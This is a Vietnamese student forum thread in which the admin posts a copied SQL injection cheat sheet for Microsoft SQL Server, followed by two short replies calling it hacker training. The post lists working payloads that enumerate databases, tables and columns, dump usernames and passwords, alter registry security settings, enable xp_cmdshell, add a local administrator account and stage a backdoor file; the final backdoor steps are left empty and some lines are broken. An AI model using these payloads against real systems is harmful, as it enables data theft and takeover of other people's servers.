Diễn Đàn Học Sinh Trường Trung Cấp Xây Dựng Tp.HCM
Chào mừng Khách viếng thăm đến với diễn đàn học sinh trường TCXD. TPHCM. Các bạn hãy đăng ký thành viên để tiện cho việc xem bài viết nhé. Cám ơn các bạn!!!

Diễn Đàn Học Sinh Trường Trung Cấp Xây Dựng Tp.HCM

Mỗi một thành viên là một viên gạch xây dựng diễn đàn
 
Trang ChínhCalendarTrợ giúpTìm kiếmĐăng kýĐăng NhậpPhotoshop  Online
News & Announcements
 Admin (200)
 lethuy_daotaoxaydung (157)
 solle bilo (86)
 nguyenhai777 (86)
 ĐàmDuyên (51)
 chaichai (31)
 phankalee (23)
 bucghe (20)
 cantlive (16)
 Black_Pig (12)
Hướng Dẫn Tạo Khung Chữ Ký Dưới Bài Viết
Du học Đài Loan - Học bổng 100% tại Trường đại học Kiến Quốc (Chienkuo Technology University)
Học Bổng Du Học Anh Ngành KINH DOANH, TÀI CHÍNH – KẾ TOÁN– MAKETING Trường LSBF London
Thủ thuật học bài tin học
Ngày Tết Truyền Thống Khác Lạ Của Người Do Thái
Hội Thảo Phỏng Vấn Trực Tiếp Cấp Học Bổng DU HỌC ANH - Kỳ Nhập Học 2014
[Volambisu.com] Khai mở Server Thanh Long 10h ngày 15/11-Đua Top nhận SamsungGALAXY
[Volambisu.com] Khai mở Server Thanh Long 10h ngày 15/11-Đua Top nhận SamsungGALAXY
HỘI THẢO DU HỌC ERC SINGAPORE - Chuyển Tiếp Tín Chỉ ĐH-CĐ Lấy Bằng ĐH Anh Quốc Chỉ Với 1 Năm Tại ERC, 16/11/2013
DU HỌC ANH - Phỏng Vấn Trực Tiếp 02/11 Với Đại Diện Trường Cấp Học Bổng Trường LSC, Chester, Anglia Ruskin University
Sân khấu chuyên nghiệp dành cho sự kiện
Nguyệt Nhãn Thông báo Open Alpha Test 10h00 ngày 12/10/2103
[ Nguyệt Nhãn ] Game võ hiệp 2.5D -- Tưng Bừng Event nhận GifCode khủng cho tân thủ
Học Lập trình web PHP - Cam kết 100% Thiết kế được website ngay trong khóa học
Cho thuê nhà bạt chuyên nghiệp dành chó sự kiện ngoài trời
Chữ ký số là gì ?
SOLLE BILO hãy lắng nghe..... nói và ......hi!
help me
mem mới
xd 09-12
kingkingpy  
duhocdailoangea  
prince_bolide  
prince_bolide  
xuanvuive2013  
Du_hoc_Newworld  
nguyenhai777  
nguyenhai777  
Du_hoc_Newworld  
Du_hoc_Newworld  
htkim1  
nguyenhai777  
nguyenhai777  
leupanh  
htkim1  
thanhvt1985  
Rùa  
Rùa  
Rùa  
Admin  

SQL - Injection cơ bản và nâng caoXem chủ đề cũ hơn Xem chủ đề mới hơn Go down
Mon Jan 02, 2012 5:35 pm
Trụ Cột Của Giúp Đỡ
avatar
4R HS Trường TCXD.TPHCM - Admin-
Tổng số bài gửi : 200
Thanked : 79
Join date : 23/11/2011
Age : 27
Đến từ : Khu dân cư Gamer
Châm ngôn sống : Trụ Cột Của Giúp Đỡ
Comments : YH: honma_battri2000

Tài Sản
Huy Chương:
Profile Admin
Tổng số bài gửi : 200
Thanked : 79
Join date : 23/11/2011
Age : 27
Đến từ : Khu dân cư Gamer
Châm ngôn sống : Trụ Cột Của Giúp Đỡ
Comments : YH: honma_battri2000

Bài gửiTiêu đề: SQL - Injection cơ bản và nâng cao
http://tcxd.forumvi.com

Tiêu đề: SQL - Injection cơ bản và nâng cao

1. Khai thác thông tin về MS SQL server

' Thông tin về version của MS SQL
and 1=@@version--sp_password
'Thông tin về servername
and 1=@@servername--sp_password
'Thông tin về SERVICENAME
and 1=@@SERVICENAME--sp_password
'Thông tin về UID
and 1=system_user--sp_password
'Thông tin về PWD
?

2. Khai thác thông tin về Database

'Thông tin về tên database
and 1=db_name()--sp_password

3. Khai thác thông tin về Table
'Khai thác thông tin về Table
having 1=1--sp_password
'Khai thác thông tin về các Table
group by QUESTIONS.QUEST_ID having 1=1--sp_password

'Khai thác thông tin về Table
UNION SELECT TOP 1 TABLE_NAME FROM
INFORMATION_SCHEMA.TABLES--sp_password
'Khai thác thông tin về các Table
UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE
TABLE_NAME NOT IN ('PRODUCTS')--sp_password

'Khai thác thông tin về Table
and 38=convert(int,(select top 1 table_name from
information_schema.tables))--sp_password
'Khai thác thông tin về các Table
and 38=convert(int,(select top 1 table_name from
information_schema.tables
where table_name not in ('PRODUCTS')))--sp_password

4. Khai thác thông tin về Column

'Khai thác thông tin về Column
and 38=convert(int,(select top 1 column_name from
information_schema.columns where
table_name=('QUESTIONS')))--sp_password
'Khai thác thông tin về các Column
and 38=convert(int,(select top 1 column_name from
information_schema.columns where table_name=('QUESTIONS') and
column_name
not in ('QUEST_ID')))--sp_password

5. Khai thác thông tin về Content

'Khai thác thông tin với kiểu ngày giờ
and 1=convert(char(20),(select top 1 NgayXuat from
PhieuXuat))--sp_password
'Khai thác thông tin dòng tiếp theo với kiểu ngày giờ
and 1=convert(char(20),(select top 1 NgayXuat from PhieuXuat where
NgayXuat<>'Mar 12 2003 12:00AM '))--sp_password
'Khai thác thông tin về dòng đầu tiên
and 1=convert(int,(select top 1 userName+'/'+userPass from
Users))--sp_password
'Khai thác thông tin dòng tiếp theo
and 1=convert(int,(select top 1 userName+'/'+userPass from Users where
userName not in('admin')))--sp_password

6. Khai thác thông tin về Table, Column, Content của các database tiep

Chú ý:
để nhận biết kiểu của cột
dữ liệu ta dùng "image" để kiểm tra:
-Nếu là trường kiểu ngày/giờ
Dùng: char,nchar,nvarchar,varchar


B. Upload backdoor lên host

1. Xác định mức quyền và cho phép thực thilệnh của MS SQL server

'Xác định mức quyền
;select * from openrowset('sqloledb','';;,'')--
'Thay đổi mức quyền
;exec master..xp_regwrite
HKEY_LOCAL_MACHINE,'SOFTWARE\Microsoft\MSSQLServer \Providers\SQLOLEDB','AllowInProcess',REG_DWORD,1--
;exec master..xp_regwrite
HKEY_LOCAL_MACHINE,'SOFTWARE\Microsoft\MSSQLServer \Providers\SQLOLEDB','DisallowAdhocAccess',REG_DWO RD,0--
'Xoá bỏ và khôi phục Log và firewall trong MS SQL
;exec master..xp_regdeletevalue
'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Ser vices\Tcpip\Parameters','EnableSecurityFilters'--
;exec master..xp_regwrite
'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Ser vices\Tcpip\Parameters','EnableSecurityFilters',RE G_DWORD,0--
'Cho phép sử dụng MASTER..XP_CMDSHELL & ALLOW UPDATES
;select * from openrowset('sqloledb',
'server=Digital;uid=BUILTIN\Administrators;pwd=', 'set fmtonly off
select
1 exec master..sp_addextendedproc xp_cmd,''xpsql70.dll'' exec
sp_configure
''allow updates'', ''1'' reconfigure with override')--

2. Do thám đưa thêm các thông tin

'Do tham IP của server và đưa vào bảng testip
;drop table testip create table testip(stt int identity,dcip
varchar(1000)) insert into testip exec master..xp_cmdshell 'ipconfig'--
'Cộng thêm một quyền quản trị mới
;select * from openrowset('sqloledb',
'server=digital;uid=BUILTIN\Administrators;pwd=', 'set fmtonly off
select
1 exec xp_cmdshell "net user a /add %26 net localgroup administrators a
/add"')-- (%26 == "&")

3. Đưa backdoor lên server'Upload backdoor lên server vào thư mục C:\WINDOWS\system32
;select * from openrowset('sqloledb',
'server=digital;uid=BUILTIN\Administrators;pwd=', 'set fmtonly off
select
1 exec master..xp_cmdshell "chube >>runfile.txt"')--
;select * from openrowset('sqloledb',
'server=digital;uid=BUILTIN\Administrators;pwd=', 'set fmtonly off
select
1 exec master..xp_cmdshell "chube >>runfile.txt & hamhoc
>>runfile.txt"')--
'Kiểm tra xem backdoor đã upload thành công chưa
;drop table testip create table testip(stt int identity,dcip
varchar(1000)) insert into testip exec master..xp_cmdshell 'dir
runfile.txt'--

C. Chạy backdoor trên server
1. Xác nhận backdoor đã được kích hoạt

2. Chiếm toàn bộ quyền điều khiển server

leech từ nhiều nguồn khác nhau

Tài Sản Của Admin
Tài Sản
Huy Chương:

Chữ Ký Của Admin

-------------------------------------------------------------------------------
Trụ Cột Của Forum


Mọi Thắc Từ Xin Liên Hệ Về Địa Chỉ Sau:
Gmail : Banquantri4r@gmail.com
Chào mừng bạn Khách viếng thăm đã đến với Forum Trường TCXD TPHCM!

Mon Jan 02, 2012 6:33 pm
Tình yêu luôn bên ta, nhưng vẫn cô đơn!
avatar
4R HS Trường TCXD.TPHCM - solle bilo-

Tổng số bài gửi : 86
Thanked : 31
Join date : 24/11/2011
Age : 25
Đến từ : CAI LẬY - TIỀN GIANG - VIỆT NAM
Châm ngôn sống : Tình yêu luôn bên ta, nhưng vẫn cô đơn!

Tài Sản
Huy Chương:
Profile solle bilo
Tổng số bài gửi : 86
Thanked : 31
Join date : 24/11/2011
Age : 25
Đến từ : CAI LẬY - TIỀN GIANG - VIỆT NAM
Châm ngôn sống : Tình yêu luôn bên ta, nhưng vẫn cô đơn!

Bài gửiTiêu đề: Re: SQL - Injection cơ bản và nâng cao

Tiêu đề: SQL - Injection cơ bản và nâng cao

Cái j vậy................

Tài Sản Của solle bilo
Tài Sản
Huy Chương:

Chữ Ký Của solle bilo

Mon Jan 02, 2012 6:36 pm
Trụ Cột Của Giúp Đỡ
avatar
4R HS Trường TCXD.TPHCM - Admin-
Tổng số bài gửi : 200
Thanked : 79
Join date : 23/11/2011
Age : 27
Đến từ : Khu dân cư Gamer
Châm ngôn sống : Trụ Cột Của Giúp Đỡ
Comments : YH: honma_battri2000

Tài Sản
Huy Chương:
Profile Admin
Tổng số bài gửi : 200
Thanked : 79
Join date : 23/11/2011
Age : 27
Đến từ : Khu dân cư Gamer
Châm ngôn sống : Trụ Cột Của Giúp Đỡ
Comments : YH: honma_battri2000

Bài gửiTiêu đề: Re: SQL - Injection cơ bản và nâng cao
http://tcxd.forumvi.com

Tiêu đề: SQL - Injection cơ bản và nâng cao

dạy làm hacker ấy mà

Tài Sản Của Admin
Tài Sản
Huy Chương:

Chữ Ký Của Admin

-------------------------------------------------------------------------------
Trụ Cột Của Forum


Mọi Thắc Từ Xin Liên Hệ Về Địa Chỉ Sau:
Gmail : Banquantri4r@gmail.com
Chào mừng bạn Khách viếng thăm đã đến với Forum Trường TCXD TPHCM!

4R HS Trường TCXD.TPHCM - Sponsored content-
Profile Sponsored content

Bài gửiTiêu đề: Re: SQL - Injection cơ bản và nâng cao

Tiêu đề: SQL - Injection cơ bản và nâng cao

Tài Sản Của Sponsored content
Chữ Ký Của Sponsored content


SQL - Injection cơ bản và nâng cao

Xem chủ đề cũ hơn Xem chủ đề mới hơn Về Đầu Trang
Trang 1 trong tổng số 1 trang
* Không dùng những ngôn từ thiếu lịch sự.
* Bài viết sưu tầm nên ghi rõ nguồn.
* Tránh spam nhảm không liên quan đến chủ đề.

Yêu cầu viết tiếng Việt có dấu.


Permissions in this forum:Bạn không có quyền trả lời bài viết
Diễn Đàn Học Sinh Trường Trung Cấp Xây Dựng Tp.HCM :: Khu Vực Dành Cho Dân I Tờ :: Khu Vực C.E.H-
Click ChatBox Ver 2 [?] - Online [?]
frontpage stats
Designer By Martin™
Free forum | © phpBB | Free forum support | Liên hệ | Report an abuse | Sosblogs.com